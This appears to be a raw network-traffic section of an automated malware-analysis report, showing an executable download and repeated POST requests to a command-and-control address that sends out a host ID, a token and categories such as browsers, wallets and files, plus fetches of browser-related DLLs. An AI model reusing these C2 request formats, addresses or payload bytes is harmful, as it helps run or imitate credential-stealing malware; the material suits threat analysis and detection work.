00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Apr 2024 07:04:34 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 24 Apr 2024 21:15:46 GMTETag: "85400-616de2c892480"Accept-Ranges: bytesContent-Length: 545792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDBHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 38 37 35 41 31 36 36 42 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 2d 2d 0d 0a Data Ascii: ------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="hwid"79875A166BA11720009369------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="build"default10------IJKJDAFHJDHIEBGCFIDB--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIIDAFIDGCFHJJDGDAHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 2d 2d 0d 0a Data Ascii: ------GDHIIDAFIDGCFHJJDGDAContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------GDHIIDAFIDGCFHJJDGDAContent-Disposition: form-data; name="message"browsers------GDHIIDAFIDGCFHJJDGDA--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJDHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 2d 2d 0d 0a Data Ascii: ------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="message"plugins------GIJJKKJJDAAAAAKFHJJD--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKEHost: 185.172.128.76Content-Length: 6183Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDBHost: 185.172.128.76Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGIHost: 185.172.128.76Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="file"------DAKEBAKFHCFHIEBFBAFB--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGIHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 2d 2d 0d 0a Data Ascii: ------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="file"------KJDGDBFBGIDGIEBGHCGI--
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEBHost: 185.172.128.76Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDHCAFCGDAAKEBFIJDGHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 2d 2d 0d 0a Data Ascii: ------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="message"wallets------KJDHCAFCGDAAKEBFIJDG--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDBHost: 185.172.128.76Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 2d 2d 0d 0a Data Ascii: ------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="message"files------AFCFHJJECAEHJJKEHIDB--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFIIJDAAAAKFHIDAAAKHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAFHCAKFBFIECAFIIJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIECFHDBAAECAAKFHDHHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFIEBKKJJDAKFHIDBFHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFHHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKFCGHIDHCBGDHJKEBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKJDHIEBFIIDGDGDBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIECBFIDGDAKFHIEHJKFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHIDGCAFCBAAAAAFHDAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGDGDHDGDBFIDHDBAHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAECGIEBKKFHIDAKECHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAAAKJKJEBGHJKFHIDGHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKJKFBKKECFHJKEBKEHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIIDAFIDGCFHJJDGDAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAFHCAKFBFIECAFIIJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHJDGIDBAAFIDGCGCAKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAAAKJKJEBGHJKFHIDGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCAAFBFBKFIDGDHJDBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHIJKJKFIDHJKFBGHCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGIJEGHDAECAKECAFCAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
